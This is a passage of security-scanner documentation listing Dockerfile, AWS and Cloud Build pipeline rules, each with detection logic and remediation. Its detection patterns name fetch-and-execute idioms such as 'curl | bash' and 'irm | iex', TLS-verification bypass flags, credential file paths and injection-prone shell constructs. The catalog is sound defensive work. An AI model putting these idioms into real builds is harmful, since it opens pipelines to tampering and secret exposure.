How this is detected. Pure-local ADD <path> <dest> is functionally identical to COPY, but ships extra-feature surface (URL fetch, tarball auto-extract) that adds nothing and turns a benign-looking filename change into a behavior change. The Docker docs have recommended COPY for non-URL inputs since 2014.
Recommendation. Replace ADD ./local with COPY ./local. ADD has two implicit behaviors that make it the wrong default. It fetches HTTP(S) URLs and it auto-extracts .tar / .tar.gz archives. Both are easy to invoke accidentally and neither is reproducible. Reserve ADD for a deliberate URL-pull (covered by DF-003) or an explicit tarball extract.
Source: DF-009 in the Dockerfile provider.
DF-010: apt-get dist-upgrade / upgrade pulls unknown package versions LOW
Evidences: CM-2 Baseline Configuration, SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes.
How this is detected. Running apt-get upgrade (or dist-upgrade) inside a Dockerfile is the classic pet-vs-cattle anti-pattern. Two back-to-back builds with the same Dockerfile can produce different images because the upstream archive moved between the two RUN invocations. dist-upgrade additionally relaxes dependency resolution. It can install / remove arbitrary packages to satisfy upgrades, so the resulting image's package set isn't even bounded by what the Dockerfile declares.
Recommendation. Drop the upgrade step. Build on a recent base image instead (rebuild your image when the base image gets a security patch, pin the base by digest per DF-001 so the rebuild is deterministic). apt-get install pkg=<version> for specific packages stays reproducible; upgrade / dist-upgrade does not.
Source: DF-010 in the Dockerfile provider.
DF-011: Package manager install without cache cleanup in same layer LOW
Evidences: CM-6 Configuration Settings.
How this is detected. Each Dockerfile RUN produces a layer. Installing packages in one layer and cleaning the cache in a later layer leaves the cache files in the lower layer forever: final image size is unchanged, and the residual files broaden the attack surface (e.g. apt's signed-by keys, package metadata). The fix is layout, not behavior: do install + cleanup in the same RUN.
Recommendation. Combine the install and cleanup into the same RUN so the cache lands in a single layer that gets discarded together. Idiomatic pattern: RUN apt-get update && apt-get install -y <pkgs> && rm -rf /var/lib/apt/lists/*. Equivalent forms: apk add --no-cache <pkgs>, dnf install -y … && dnf clean all, yum install -y … && yum clean all, zypper -n in … && zypper clean -a.
Source: DF-011 in the Dockerfile provider.
DF-012: RUN invokes sudo HIGH
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. sudo inside a Dockerfile is almost always a copy-paste from a host README. Its presence usually means one of three things, all of them wrong: (a) the build is silently running as root and the operator misread it, (b) the image carries an unrestricted sudoers line that a runtime escape can abuse, or (c) the package install chain depends on TTY-aware sudo behavior that breaks under non-TTY docker build. None of these cases benefit from keeping the directive.
Recommendation. Drop sudo from the RUN. Either the build is already running as root (the default before any USER directive), in which case sudo is no-op noise, or the build switched to a non-root USER and needs root for a specific step, in which case temporarily revert with USER root for that RUN and switch back afterward.
Source: DF-012 in the Dockerfile provider.
DF-013: EXPOSE declares sensitive remote-access port CRITICAL 🔧 fix
Evidences: CM-7 Least Functionality, SC-7 Boundary Protection.
How this is detected. EXPOSE is documentation, not a firewall. It doesn't actually open the port. But EXPOSE 22 is a strong signal the image runs sshd, and any remote-access daemon inside the container blows up the threat model: now you have an extra auth surface, an extra service to keep patched, and a way for a compromised app to phone home from the outside. The container runtime / orchestrator's exec path covers every operational use case sshd traditionally served.
Recommendation. Remove the EXPOSE line for the remote-access port. If the operator legitimately needs to reach the container, exec into it (docker exec / kubectl exec). That path uses the orchestrator's auth and audit, doesn't open a network port, and doesn't ship an extra daemon inside the image. Containers should not run sshd / telnetd / ftpd / rsh-d / vncd / RDP alongside the application.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: DF-013 in the Dockerfile provider.
DF-014: WORKDIR set to a system / kernel filesystem path CRITICAL
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. Subsequent directives in the Dockerfile (COPY src dest, RUN writes, ADD …) resolve relative paths against the active WORKDIR. A WORKDIR /sys followed by COPY conf.txt config.txt writes into the kernel's sysfs surface, at best a build-time error, at worst a container-escape primitive that lets a compromised step manipulate cgroups, devices, or kernel config.
Recommendation. Move WORKDIR to a dedicated app directory (/app, /srv/app, /opt/<service>). System paths like /sys, /proc, /dev, /etc, / and the root home are not application directories; pointing the working dir at one means subsequent COPY / RUN writes target kernel-exposed namespaces or admin-only configuration.
Source: DF-014 in the Dockerfile provider.
DF-015: RUN grants world-writable permissions (chmod 777 / a+w) MEDIUM
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. World-writable directories under / are an established container-escape vector: any compromised process running as non-root can drop a payload that root-owned daemons later execute. The rule fires on the literal 777, a+w, and a+rwx modes; the more conservative 775 and ugo+x are not flagged.
Recommendation. Replace chmod 777 <path> with the narrowest permissions the workload actually needs. chmod 755 is enough for executables under a read-only root filesystem; 640 or 600 for files the runtime user reads. a+w is almost always copy-pasted from a SO answer and almost never the correct fix.
Known false positives.
- Test fixtures or scratch builds that intentionally share a directory across multiple non-root users may legitimately use 777. Suppress with an ignore-file entry rather than weakening the rule.
Source: DF-015 in the Dockerfile provider.
DF-016: Image lacks OCI provenance labels LOW
Evidences: CM-8 System Component Inventory, SR-4 Provenance.
How this is detected. The OCI image-spec annotation set is a small de facto standard maintained by the OCI working group. Only image.source and image.revision are checked because they're the two whose absence makes incident response materially harder; image.title / image.description are nice-to-have but the rule doesn't fire on those.
Recommendation. Add a LABEL line carrying at least org.opencontainers.image.source (the URL of the source repo) and org.opencontainers.image.revision (the commit SHA built into the image). Most registries surface those fields in the UI and on manifest inspect, which closes the source-to-image gap that GHA-006 / SLSA Build-L2 provenance attestation also addresses.
Known false positives.
- A multi-stage build's intermediate stages don't need provenance labels; only the final image ships. The rule fires per Dockerfile, not per stage; suppress for files where the final FROM is an intentional throwaway scratch stage.
Source: DF-016 in the Dockerfile provider.
DF-017: ENV PATH prepends a world-writable directory MEDIUM 🔧 fix
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. A writable PATH entry that comes before the system bins lets any process inside the container shadow ls, ps, apt-get, cat, etc. by dropping a binary of the same name into the writable dir. On a multi-tenant image, or any image where an exploit can reach the filesystem, this is a free privilege-escalation vector.
Recommendation. Don't put /tmp, /var/tmp, /dev/shm, or any other world-writable path in PATH ahead of the system binary directories. Drop those entries entirely, or place them at the tail (ENV PATH=/usr/bin:$PATH:/tmp) so legitimate binaries always shadow anything dropped into the writable dir at runtime.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: DF-017 in the Dockerfile provider.
DF-018: RUN chown rewrites ownership of a system path MEDIUM
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. Recognises chown and chgrp invocations whose first non-flag path argument resolves under a system directory. The non-recursive case is also flagged because a single chown user /etc is just as harmful; the recursive flag matters for the size of the blast radius, not for whether it's wrong. Application paths under /opt, /srv, /var/lib/<app>, and /app are not flagged.
Recommendation. Don't chown system directories at build time. If the runtime user needs to own a workload-specific subtree, COPY --chown=<user>:<group> it into the image at the subtree root, or place the workload under a dedicated directory (e.g. /app, /srv/app) and chown only that path. Granting the runtime user write access to /etc, /usr, /sbin, or /lib lets a process exploit later steps to stage a binary the system trusts.
Source: DF-018 in the Dockerfile provider.
DF-019: COPY/ADD source path looks like a credential file HIGH 🔧 fix
Evidences: IA-5 Authenticator Management, SC-28 Protection of Information at Rest.
How this is detected. Fires on any COPY or ADD whose source basename is a well-known credential filename (id_rsa, .npmrc, .netrc, .env, terraform.tfvars, …) or whose path tail matches a canonical credential location (.aws/credentials, .docker/config.json, .kube/config). Files with private-key extensions (.pem, .key, .p12, .pfx, .jks) are also flagged. Globs are not expanded, the rule reads the literal source token.
Recommendation. Don't COPY credential files into an image. Anything baked into a layer is recoverable by anyone who can pull the image, even if a later step deletes the file. For build-time secrets (npm tokens, registry credentials, SSH deploy keys), use RUN --mount=type=secret,id=<name> so the value lives only for the duration of the step. For runtime secrets, mount them from the orchestrator (Kubernetes Secret, ECS task role, Vault sidecar) instead.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Empty placeholder files (.env shipped as a template, config.json carrying only public flags). Suppress with a brief .pipelinecheckignore rationale and prefer an explicit non-secret name (.env.example).
Source: DF-019 in the Dockerfile provider.
DF-020: ARG declares a credential-named build argument HIGH 🔧 fix
Evidences: AU-2 Event Logging, IA-5 Authenticator Management.
How this is detected. Complements DF-006 (which flags an ENV/ARG with a literal credential-shaped value). This rule fires on the name alone (ARG NPM_TOKEN, ARG GITHUB_PAT, ARG DB_PASSWORD), even when no default is set, because BuildKit records the resolved value in the image's history the moment --build-arg supplies one. Names are matched via the same _primitives/secret_shapes regex used by the other secret-name rules.
Recommendation. Don't pass secrets through ARG. Build arguments are recorded in docker history whether the value comes from a default or from --build-arg at build time, so a credential-named ARG leaks the secret to anyone who can pull the image. Use RUN --mount=type=secret,id=<name> and feed the value with BuildKit's --secret flag; the secret never lands in a layer or in the build history.
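A migration sketch using a hypothetical npm token; the secret id and file path are illustrative, not the only valid shape:
```dockerfile
# The token is mounted at /run/secrets/npm_token only for the
# duration of this RUN; nothing lands in a layer or in history.
RUN --mount=type=secret,id=npm_token \
    NPM_TOKEN="$(cat /run/secrets/npm_token)" npm ci
```
Feed the value at build time with docker buildx build --secret id=npm_token,src=./npm_token.txt . (newer BuildKit also accepts env=NPM_TOKEN as the source).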
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- An ARG whose name matches the regex but is a non-secret config knob (a counter-example like ARG TOKEN_LIMIT). Rare; rename or suppress the finding with a brief rationale.
Source: DF-020 in the Dockerfile provider.
EB-001: No EventBridge rule for CodePipeline failure notifications MEDIUM
Evidences: AU-2 Event Logging, SI-2 Flaw Remediation.
How this is detected. Pipeline failure events are emitted to EventBridge automatically; the missing piece is a rule that pipes them to somewhere a human reads (SNS, Slack, PagerDuty). Without it, failures only surface via the CodePipeline console, which no one watches.
Recommendation. Create an EventBridge rule matching detail-type: 'CodePipeline Pipeline Execution State Change' and state: FAILED, and point it at an SNS topic or chat webhook. Without it, pipeline failures during an incident (a compromise triggering rollback, for example) go unnoticed.
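A sketch; the rule name and topic ARN are placeholders:
```bash
aws events put-rule \
  --name codepipeline-failures \
  --event-pattern '{
    "source": ["aws.codepipeline"],
    "detail-type": ["CodePipeline Pipeline Execution State Change"],
    "detail": {"state": ["FAILED"]}
  }'

aws events put-targets \
  --rule codepipeline-failures \
  --targets 'Id=oncall-sns,Arn=arn:aws:sns:us-east-1:123456789012:pipeline-alerts'
```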
Source: EB-001 in the AWS provider.
EB-002: EventBridge rule has a wildcard target ARN HIGH
Evidences: AC-6 Least Privilege.
How this is detected. Wildcard target ARNs (e.g. arn:aws:lambda:us-east-1:123456789012:function:*) match every resource that fits the prefix. This is rarely intentional, usually a copy-paste from a more permissive resource ARN, and means the rule fans out to a much larger set of consumers than the author meant.
Recommendation. Replace wildcard target ARNs with specific resource ARNs. EventBridge targets with * route events to any resource that matches the prefix, frequently triggering unintended Lambda invocations or SNS sends.
Source: EB-002 in the AWS provider.
ECR-001: Image scanning on push not enabled HIGH
Evidences: RA-5 Vulnerability Monitoring and Scanning, SA-11 Developer Testing and Evaluation, SI-2 Flaw Remediation.
How this is detected. scan-on-push runs a CVE check against the image's OS package layers at the moment it lands in ECR. Without it, an image with a known CVE deploys silently. The ECR basic scanner is free; ECR-007 covers the Inspector v2 enhanced scanner that adds language-ecosystem CVEs (npm, pip, gem).
Recommendation. Enable imageScanningConfiguration.scanOnPush on the repository. Consider also enabling Amazon Inspector continuous scanning for ongoing CVE detection against images already in the registry.
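The repository-level toggle via the CLI (repository name is a placeholder):
```bash
aws ecr put-image-scanning-configuration \
  --repository-name my-repo \
  --image-scanning-configuration scanOnPush=true
```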
Source: ECR-001 in the AWS provider.
ECR-002: Image tags are mutable HIGH
Evidences: CM-8 System Component Inventory, SI-7 Software, Firmware, and Information Integrity, SR-4 Provenance, SR-11 Component Authenticity.
How this is detected. Mutable tags mean :latest, :v1.0, and :stable can be re-pushed silently: the same tag points to different image content over time. Pinning by digest (sha256:...) in deployment manifests is the only durable reference; IMMUTABLE on the repo enforces the property registry-side so a forgotten digest reference doesn't drift.
Recommendation. Set imageTagMutability=IMMUTABLE on the repository. Reference images by digest (sha256:...) in deployment manifests for strongest immutability guarantees.
Source: ECR-002 in the AWS provider.
ECR-003: Repository policy allows public access CRITICAL
Evidences: AC-3 Access Enforcement, SC-7 Boundary Protection, SR-3 Supply Chain Controls and Processes.
How this is detected. A wildcard-principal repo policy means anyone on the internet can pull images. Sometimes intentional (a publicly-distributed base image), but should be a deliberate exposure, typically via the ECR Public registry rather than a private repo with a public policy. The default for build-output images should never be public.
Recommendation. Remove wildcard principals from the repository policy. Grant access only to specific AWS account IDs or IAM principals that require it.
Source: ECR-003 in the AWS provider.
ECR-004: No lifecycle policy configured LOW
Evidences: CM-2 Baseline Configuration, CM-8 System Component Inventory.
How this is detected. Without a lifecycle policy, untagged images and old tagged images accumulate indefinitely. Stale images keep CVE attack surface available; anyone who can pull from the repo can pull the old, unpatched version even after a newer build has shipped. Lifecycle expiry is the housekeeper that closes that window.
Recommendation. Add a lifecycle policy that expires untagged images after a short period (e.g. 7 days) and limits the number of tagged images retained, reducing exposure to images with known CVEs.
Source: ECR-004 in the AWS provider.
ECR-005: Repository encrypted with AES256 rather than KMS CMK MEDIUM
Evidences: SC-12 Cryptographic Key Establishment and Management, SC-13 Cryptographic Protection, SC-28 Protection of Information at Rest, SR-4 Provenance.
How this is detected. Same shape as CP-002 / CWL-002 / CCM-002: AES256 (the AWS-managed default) gives confidentiality at rest but no key-policy or CloudTrail Decrypt-event story. Container images are arguably sensitive intellectual property; the same key-policy + audit shape as build outputs in S3 is warranted.
Recommendation. Set encryptionType=KMS with a customer-managed key ARN.
Source: ECR-005 in the AWS provider.
GCB-001: Cloud Build step image not pinned by digest HIGH 🔧 fix
Evidences: RA-5 Vulnerability Monitoring and Scanning, SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Bare references (gcr.io/cloud-builders/docker) are treated as :latest by Cloud Build. Tag-only references (:20, :latest) count as unpinned. Only @sha256:… suffixes pass.
Recommendation. Pin every steps[].name image to an @sha256:<digest> suffix. gcr.io/cloud-builders/docker:latest is mutable; Google publishes new builder images frequently and the next build would pull whatever is current. Resolve the digest with gcloud artifacts docker images describe <ref> --format='value(image_summary.digest)' and pin it.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GCB-001 in the Cloud Build provider.
GCB-002: Cloud Build uses the default service account HIGH
Evidences: AC-3 Access Enforcement, AC-6 Least Privilege.
How this is detected. The default Cloud Build service account historically held roles/cloudbuild.builds.builder plus project-level editor in many organisations. Even under the GCP April-2024 default-identity change, the default SA is still broader than what a single pipeline needs. Explicit serviceAccount: is required to pass.
Recommendation. Create a dedicated service account for the build, grant it only the roles the pipeline actually needs (roles/artifactregistry.writer, roles/storage.objectCreator for artifact upload, etc.), and set serviceAccount: projects/<PROJECT>/serviceAccounts/<NAME>@.... Leaving it unset falls back to the default Cloud Build SA, which accumulates roles over a project's lifetime and is routinely granted roles/editor.
Source: GCB-002 in the Cloud Build provider.
GCB-003: Secret Manager value referenced in step args HIGH
Evidences: IA-5 Authenticator Management.
How this is detected. Detection patterns: literal projects/<n>/secrets/<name>/versions/... URIs, gcloud secrets versions access shell invocations, and $(gcloud secrets …) command substitutions in step args or entrypoint.
Recommendation. Map the secret under availableSecrets.secretManager[] with an env: alias, then reference it from each step via secretEnv: [ALIAS]. Avoid inline gcloud secrets versions access in args: the resolved plaintext lands in build logs.
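A sketch of the mapped form; project, secret name, version, and registry host are placeholders:
```yaml
availableSecrets:
  secretManager:
    - versionName: projects/my-project/secrets/registry-token/versions/7
      env: REGISTRY_TOKEN
steps:
  - name: gcr.io/cloud-builders/docker
    entrypoint: bash
    secretEnv: ['REGISTRY_TOKEN']
    # $$ defers expansion to the step's shell, so the plaintext never
    # appears in the expanded build config or the logs:
    args: ['-c', 'echo "$$REGISTRY_TOKEN" | docker login -u ci --password-stdin registry.example.com']
```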
Source: GCB-003 in the Cloud Build provider.
GCB-005: Build timeout unset or excessive LOW 🔧 fix
Evidences: CM-6 Configuration Settings.
How this is detected. Cloud Build's default 10-minute timeout applies silently when timeout: is absent. Accepted format is <N>s (seconds); <N>m/<N>h forms are a gcloud convenience and are treated as malformed by the API.
Recommendation. Declare an explicit timeout: at the top of cloudbuild.yaml bounded to the build's realistic worst case (e.g. 1800s for most container builds). Explicit bounds shorten the window a compromised build can spend on a shared worker and flag regressions when a legitimate step slows down.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GCB-005 in the Cloud Build provider.
GCB-006: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation.
How this is detected. Complements GCB-004 (dynamicSubstitutions + user substitution in args). GCB-006 fires on intrinsically risky shell idioms (eval, sh -c "$X", backtick exec) regardless of whether the substitution source is currently trusted.
Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec with direct command invocation. Validate or allow-list any value that must feed a dynamic command at the boundary. In Cloud Build these idioms typically appear in args: [-c, ...] entries under a bash entrypoint.
Known false positives.
- eval "$(ssh-agent -s)" and similar eval "$(<literal-tool>)" bootstrap idioms are intentionally NOT flagged: the substituted command is literal, only its output is eval'd.
Source: GCB-006 in the Cloud Build provider.
GCB-007: availableSecrets references versions/latest MEDIUM 🔧 fix
Evidences: CM-2 Baseline Configuration, SR-4 Provenance.
How this is detected. versions/latest is documented as a rolling alias. A build run on Monday and a re-run on Tuesday can consume different secret bodies without any change to cloudbuild.yaml, breaking the reproducibility invariant that pinning protects.
Recommendation. Pin each availableSecrets.secretManager[].versionName to a specific version number (.../versions/7) rather than latest. Rotate by updating the number when a new version is promoted, not by silently publishing a new version that the next build pulls.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GCB-007 in the Cloud Build provider.
GCB-008: No vulnerability scanning step in Cloud Build pipeline MEDIUM
Evidences: RA-5 Vulnerability Monitoring and Scanning, SA-11 Developer Testing and Evaluation, SI-2 Flaw Remediation.
How this is detected. The detector matches tool names anywhere in the document: step images, args, or entrypoint strings. Container Analysis API scanning configured at the project level counts as a compensating control but is out of scope for this YAML-only check; if you rely on it, suppress this rule via --checks.
Recommendation. Add a step that runs a vulnerability scanner: trivy, grype, snyk test, npm audit, pip-audit, osv-scanner, or govulncheck. In Cloud Build this typically looks like a step with name: aquasec/trivy or an entrypoint: bash step that invokes trivy image / grype <ref> on the built image.
Source: GCB-008 in the Cloud Build provider.
GCB-009: Artifacts not signed (no cosign / sigstore step) MEDIUM
Evidences: SI-7 Software, Firmware, and Information Integrity, SR-4 Provenance.
How this is detected. Silent-pass when the pipeline does not appear to produce artifacts (no docker push / gcloud run deploy / kubectl apply / etc. in any step). The detector matches cosign, sigstore, slsa-framework, and notation.
Recommendation. Add a signing step before images: is resolved; for example, a step with name: gcr.io/projectsigstore/cosign that runs cosign sign --yes <registry>/<repo>@<digest>. Pair with an attestation step (cosign attest --predicate sbom.json --type cyclonedx) so consumers can verify both the signature and the build provenance.
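A sketch of such a step; the Artifact Registry path and digest are placeholders, and the build's service account needs permission to push signatures to the repository:
```yaml
steps:
  # ...build-and-push steps precede this...
  - name: gcr.io/projectsigstore/cosign
    args:
      - sign
      - --yes
      - us-docker.pkg.dev/$PROJECT_ID/containers/app@sha256:<digest>
```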
Source: GCB-009 in the Cloud Build provider.
GCB-010: Remote script piped to shell interpreter HIGH
Evidences: SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Detects curl | bash, wget | sh, bash -c "$(curl …)", inline python -c urllib.urlopen, curl > x.sh && bash x.sh, and PowerShell irm | iex idioms. Vendor-trusted hosts (rustup.rs, get.docker.com, sdk.cloud.google.com, …) are still flagged at HIGH but the hit carries a vendor_trusted marker so dashboards can stratify known-vendor installers from arbitrary attacker URLs.
Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository and invoke it from the checkout: removing the network fetch removes the attacker-controllable content entirely.
Source: GCB-010 in the Cloud Build provider.
GCB-011: TLS / certificate verification bypass HIGH 🔧 fix
Evidences: SC-8 Transmission Confidentiality and Integrity.
How this is detected. Covers curl -k / wget --no-check-certificate, git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, PYTHONHTTPSVERIFY=0, GOINSECURE=, helm --insecure-skip-tls-verify, kubectl --insecure-skip-tls-verify, and ssh -o StrictHostKeyChecking=no.
Recommendation. Fix the underlying certificate issue, install the correct CA bundle into the step image, or point the tool at a mirror that presents a valid chain. Disabling verification trades a build error for a silent MITM window.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GCB-011 in the Cloud Build provider.
GCB-012: Credential-shaped literal in pipeline body CRITICAL
Evidences: IA-5 Authenticator Management.
How this is detected. Complements GCB-003 (inline gcloud secrets versions access) and GCB-007 (/versions/latest alias). This rule runs the shared credential-shape catalog against every string in the YAML: AWS keys, GitHub PATs, Slack webhooks, JWTs, PEM private-key blocks, and any user-registered --secret-pattern regex. Known placeholders like EXAMPLE / CHANGEME are already filtered upstream so fixtures and docs don't false-match.
Recommendation. Rotate the exposed credential immediately. Move the value to availableSecrets.secretManager and reference it via secretEnv: so the plaintext never lands in the YAML or the build logs. For cloud access prefer workload-identity federation over long-lived keys.
Source: GCB-012 in the Cloud Build provider.
GCB-013: Package install bypasses registry integrity (git / path / tarball) MEDIUM
Evidences: SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Complements GCB-012 (literal secrets) and GCB-010 (curl-pipe). Where those catch attacker content at fetch time, this rule catches installs that silently bypass the lockfile / registry integrity model: the build is technically reproducible, but the source of truth is whatever the git ref / filesystem / tarball URL served most recently.
Recommendation. Pin git dependencies to a commit SHA (pip install git+https://…/repo@<sha>, cargo install --git … --rev <sha>). Publish private packages to Artifact Registry (or another internal registry) instead of installing from a filesystem path or tarball URL.
Source: GCB-013 in the Cloud Build provider.
GCB-014: Build logging disabled (options.logging: NONE) HIGH 🔧 fix
Evidences: AU-2 Event Logging, AU-9 Protection of Audit Information, AU-12 Audit Record Generation.
How this is detected. options.logging defaults to CLOUD_LOGGING_ONLY when omitted, which passes. Only the explicit NONE value (case-insensitive) trips this rule. GCS_ONLY / LEGACY pass: they persist logs, just to a different destination.
Recommendation. Remove the logging: NONE override, or replace it with CLOUD_LOGGING_ONLY / GCS_ONLY, so every step's stdout, stderr, and exit code is persisted. Loss of logs is a detection-and-response black hole; the storage cost is measured in cents.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GCB-014 in the Cloud Build provider.
GCB-015: SBOM not produced (no CycloneDX / syft / Trivy-SBOM step) MEDIUM
Evidences: CM-8 System Component Inventory, SR-4 Provenance.
How this is detected. Complements GCB-009 (signing) and GCB-008 (vuln scanning). Without an SBOM, downstream consumers cannot audit the exact dependency set shipped in a Cloud Build image, delaying vulnerability response when a transitive dep is disclosed. Pairs naturally with cosign attest --type cyclonedx in a follow-up step.
Recommendation. Add an SBOM generation step (syft <image> -o cyclonedx-json, trivy image --format cyclonedx) and publish the resulting document alongside the image (typically via a cosign attestation so the SBOM travels with the artifact).
Source: GCB-015 in the Cloud Build provider.
GCB-016: Step dir field contains parent-directory escape (..) MEDIUM
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. Cloud Build doesn't sandbox the dir: value beyond a join against /workspace. dir: ../etc resolves to /etc inside the builder container, which is rarely the intent. The check fires on any literal .. segment; single-dot ./ and absolute paths are fine.
Recommendation. Replace .. traversals in dir: with absolute paths rooted under /workspace (e.g. dir: /workspace/sub) or split the work across multiple steps that each set dir: to an exact subdirectory. The Cloud Build worker starts each step with the workspace mounted at /workspace; a .. escape from there reaches the builder image's root filesystem and any credentials the image carries.
Source: GCB-016 in the Cloud Build provider.
GCB-017: Image-producing build does not request SLSA provenance MEDIUM
Evidences: CM-2 Baseline Configuration, SI-7 Software, Firmware, and Information Integrity, SR-4 Provenance.
How this is detected. SLSA Build Level 2 requires that the build platform produce signed provenance. Cloud Build's requestedVerifyOption: VERIFIED is the documented way to opt in. The check is silent when the build does not produce an image (no top-level images: and no docker push / gcloud run deploy style steps); for those, signing and provenance aren't applicable.
Recommendation. Set options.requestedVerifyOption: VERIFIED on builds that publish container images. Cloud Build then emits a signed SLSA provenance attestation alongside the image, which downstream verifiers (Binary Authorization, cosign verify-attestation, gcloud artifacts docker images describe) can use to check that an image was built by the configured pipeline rather than smuggled in from elsewhere.
Source: GCB-017 in the Cloud Build provider.
GCB-018: Legacy KMS secrets block in use (prefer availableSecrets / Secret Manager) MEDIUM
Evidences: CM-2 Baseline Configuration, IA-5 Authenticator Management.
How this is detected. Cloud Build supports two secret-injection mechanisms. The older secrets: block carries KMS-encrypted ciphertext directly in the YAML; the cipher is decrypted at build time if the build's service account has cloudkms.cryptoKeyDecrypter on the key. The newer availableSecrets block references Secret Manager versions by URL, which is the documented modern approach. The legacy form still works, but rotating a value means re-encrypting and committing a new ciphertext.
Recommendation. Migrate from the top-level secrets: block (KMS-encrypted values stored inline in the YAML) to availableSecrets + Secret Manager. Replace each secrets[].secretEnv mapping with a versionName reference under availableSecrets.secretManager. Secret Manager rotates without re-encrypting and re-committing the YAML, scopes access via IAM rather than the KMS key's IAM, and produces an explicit audit log entry on every read.
Known false positives.
- Builds that use both forms during a migration trip the rule on the legacy block. That's intentional; finishing the migration is the fix.
Source: GCB-018 in the Cloud Build provider.
GCB-019: Shell entrypoint inlines a user substitution into args HIGH
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation.
How this is detected. Distinct from GCB-004, which fires only when options.dynamicSubstitutions: true re-evaluates bash syntax after expansion. GCB-019 fires whenever a step uses a shell as its entrypoint AND a $_USER_VAR token lands inside args:. Cloud Build expands the substitution before the step runs, and the shell then interprets any metacharacters the substitution carried: straight command injection through trigger configuration.
Recommendation. Pass user substitutions through env: (or secretEnv: for sensitive values) and reference them inside a checked-in shell script rather than splicing them directly into args. If the step truly needs to invoke shell logic inline, switch the entrypoint to the underlying tool (docker, gcloud, gsutil) and let the tool see the substitution as an argument, not as shell text.
Source: GCB-019 in the Cloud Build provider.
GCB-020: serviceAccount points at the default Cloud Build service account HIGH
Evidences: AC-3 Access Enforcement, AC-6 Least Privilege.
How this is detected. Complements GCB-002, which only fires when serviceAccount: is unset. This rule fires when an explicit value is set but still resolves to the project default, typically the email shape <digits>@cloudbuild.gserviceaccount.com, optionally wrapped in the projects/<id>/serviceAccounts/... URI form. The April-2024 GCP default-identity change kept the same SA shape; the broad-permissions concern remains.
Recommendation. Don't bind the build to <project-number>@cloudbuild.gserviceaccount.com. The default Cloud Build SA accumulates roles over a project's lifetime (commonly roles/editor or broad Artifact Registry / Secret Manager access). Create a dedicated SA per pipeline, grant only the roles the build actually needs, and reference it by its bespoke email (<name>@<project>.iam.gserviceaccount.com). Revoking a compromised pipeline then doesn't unbind every other build in the project.
Known false positives.
- Single-pipeline GCP projects where the default SA's roles are actively scoped down. Rare in practice; create a named SA anyway so the audit log stays unambiguous about which pipeline made each API call.
Source: GCB-020 in the Cloud Build provider.
GCB-021: No private worker pool, build runs on the shared default pool MEDIUM 🔧 fix
Evidences: SC-7 Boundary Protection.
How this is detected. Cloud Build runs in a shared Google-managed pool by default. Switching to a private worker pool is the prerequisite for every other network-perimeter control: egress restriction to specific peered networks, ingress blocking of public endpoints, and traffic interoperation with VPC Service Controls. Both options.pool.name and the legacy options.workerPool field are accepted.
Recommendation. Set options.pool.name: projects/<PROJECT>/locations/<REGION>/workerPools/<NAME> to bind the build to a private worker pool inside your VPC. The default pool runs on a shared Google-managed network with public-internet egress and ingress paths Google chooses, which makes egress filtering, VPC-SC perimeters, and source-IP allowlists on internal endpoints impossible. A private pool also gives you the option to disable external IPs and to log the build's network activity through your own VPC flow logs.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- OSS / sample / one-off builds that legitimately have no private network and no internal endpoints to protect. Suppress with a brief .pipelinecheckignore rationale rather than disabling at the catalog level.
Source: GCB-021 in the Cloud Build provider.
GCB-022: options.substitutionOption set to ALLOW_LOOSE LOW 🔧 fix
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation.
How this is detected. Cloud Build accepts two values for options.substitutionOption: MUST_MATCH (default, any undefined $_VAR reference fails the build at parse time) and ALLOW_LOOSE (undefined references silently expand to ""). The default is the safer setting; this rule only fires on the explicit ALLOW_LOOSE opt-in. Builds that genuinely depend on optional substitutions should pass them through substitutions: defaults, not rely on silent empty-string fallback.
